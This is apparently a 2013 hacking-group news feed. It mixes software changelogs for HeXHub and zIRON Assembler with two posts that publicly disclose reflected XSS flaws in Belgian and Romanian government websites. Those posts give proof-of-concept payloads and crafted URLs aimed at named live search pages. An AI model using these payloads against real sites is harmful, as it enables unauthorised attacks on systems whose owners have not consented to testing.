This site uses cookies. In order to read how we handle cookies please click here. Click on this message to accept and hide.
Go to top
100.26.179.41.US.SSL

HeXHub HeXHub 5.10a

Changes in 5.10a
- corrected: user's IP was not checked when receiving the referrer (thanks to RoLex for reporting this error)

File information: HeXHub 5.10a
Posted by hexhub on 2013-12-16 21:47 0 comments 0 likes

HeXHub HeXHub 5.10

Changes in 5.10
- the hub address setting is no longer limited to a single address, it is now a list of addresses separated by commas; only the first address is registered to hublist registration servers and sent to hublist pingers, but all of them are used to verify the address users connected to
- new option on the "unknown commands" page: "Make sure the users have the right address in their favorites" (!set cmd ucommands verifyfavs , default is on); if this option is enabled, users who connected to the hub using an unknown address are redirected to the address that is registered to public hublists (the first address from the list that was set using !set hub addresses)
- new event for plugins: onBadSettings(userId,62) ("a wrong address was added to favorites as the address of this hub")
- the user search feature that is used by the "!seen" command was updated to work with the hublist from www.te-home.net
- GeoIP information was updated with GeoIPCountryWhois.csv from December 5th

File information: HeXHub 5.10
Posted by hexhub on 2013-12-16 18:56 0 comments 0 likes

zIRON zIRON Assembler 2.0.0.5

Changes in 2.0.0.5
Assembler now shows assembled file count.
Assembler will automatically create *file*.build.bat if one does not exist.
Added directive #tryinclude, this will not fail if file does not exist.

File information: zIRON Assembler 2.0.0.5
Posted by ziron on 2013-12-13 12:54 0 comments 0 likes

Ministry of Defence of Belgium - XSS

Vulnerable page: http://www.mil.be/def/search/index.asp

PoC:

Code
"><h1>XSS found by Team Elite</h1>

Code
"><img src=http://te-home.net/images/logo.png>

You can include any XSS code in search box to reproduce the bug.

XSS#1
XSS#2


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Posted by Neo on 2013-12-13 02:55 0 comments 0 likes

Ministry of Internal Affairs of Romania - XSS

Vulnerable page: http://www.mai.gov.ro/engleza/Home_eng/english.htm?searWords=

PoC:

Code
http://www.mai.gov.ro/engleza/Home_eng/english.htm?searWords=%22%3E%3Cscript%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2Fscript%3E

Code
http://www.mai.gov.ro/engleza/Home_eng/english.htm?searWords=%22%3E%3Cimg+src%3Dhttp%3A%2F%2Fte-home.net%2Fimages%2Flogo.png%3E&Send.x=8&Send.y=11

You can either include any XSS code in search input box, or request any XSS code directly using GET method and searWords parameter.

XSS#1
XSS#2


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Posted by Neo on 2013-12-11 01:12 0 comments 0 likes